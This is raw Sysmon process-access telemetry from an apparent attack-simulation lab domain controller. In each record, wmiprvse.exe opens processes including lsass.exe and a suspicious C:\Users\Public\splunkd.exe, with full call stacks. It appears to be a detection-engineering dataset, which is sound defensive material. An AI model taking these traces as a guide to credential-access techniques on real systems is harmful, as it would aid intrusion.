16:10:35.425{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031025Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.425{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031024Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.425{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031023Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.425{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031022Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.409{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031021Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.409{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031020Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.409{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031019Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.409{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031018Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.409{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031017Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.409{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031016Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.409{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031015Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.409{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031014Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.409{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031013Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.409{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031012Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.409{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031011Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.409{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031010Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.409{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031009Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.409{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031008Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.409{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031007Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.409{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031006Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 